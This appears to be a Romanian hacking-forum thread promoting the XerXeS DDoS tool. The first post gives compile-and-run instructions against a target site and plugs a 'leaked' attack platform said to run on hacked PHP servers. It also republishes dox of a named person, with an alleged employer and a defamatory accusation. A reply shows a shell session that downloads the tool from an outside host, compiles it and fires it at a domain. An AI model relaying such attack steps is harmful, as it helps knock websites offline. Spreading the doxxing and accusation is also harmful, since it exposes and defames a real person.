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Ddos- xerxes

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Posted (edited)


XerXes is one of the most powerful private DDoS tools. This tools was used by th3j35t3r to hits the WikiLeaks site with a DDoS Attack. The Jester claims the XerXeS attack can successfully disable the vast majority of websites.

Sursa - Xerxes sau aici

Revin cu un edit - How to?

-Deschideti un editor de text si creati un fisier nou apoi copiati codul in el si il salvati cu extensia .c - exemplu xerxes.c

-apoi il compilam. Deschideti un shell si scrieti urmatoarea comanda gcc -o xerxes xerxes.c

va rezulta un binar cu numele xerxes.

- Utilizare ./xerxes "site" "port" exemplu ./xerxes www.tralala.ro 80

si suplimentar th3j35ter's XerXeS Attack Platform v3.17

Leaked - th3j35ter's XerXeS Attack Platform

* Uses TORHAMMER with Keep-Alive DDOS on hacked PHP servers

* Method of attack: HEAD keep/alive + range


* Why am I releasing his dox? aks th3j35t3r aka the Jester dox - Pastebin.com

* What a f'ing pedo - th3j35ter aka Stephen Stone aka thejesterrace87 from NC. We know that because you work for the North Carolina Research and Education Network

* Because he deleted his own Google+ profile: https://profiles.google.com/thejesterrace87/about

* And he also deleted his Twitter message of:

* th3j35t3r Robin Sage - www.rjfront.info - TANGO DOWN. Temporarily. For online incitement to cause young muslims to carry out acts of violent jihad. 28 Aug

Link Pastebin

Edited by yo9gjx
Posted (edited)

Intre idsplus si docs rtfm us este 1Gbps (link-urile de la servere sunt direct conectate in router / wire speed). Deci nu e switching, nu sunt loss-uri, nimic. Si totusi, trimite niste pachete ametite vai de ele.

E batjocura. Poate daca-l rulezi de pe 100 de servere face si el ceva. Daca trimit SYN spoofed la banda aia, fuge in padure serverul :))

idsplus ~ # su - tex
tex@idsplus:~$ curl -o xerex.c http://www.airdemon.net/xerxes.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2299 100 2299 0 0 8256 0 --:--:-- --:--:-- --:--:-- 52250
tex@idsplus:~$ cc xerex.c -o xerex
tex@idsplus:~$ ./xerex docs.rtfm.us 80
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........ // output removed

Edited by aelius

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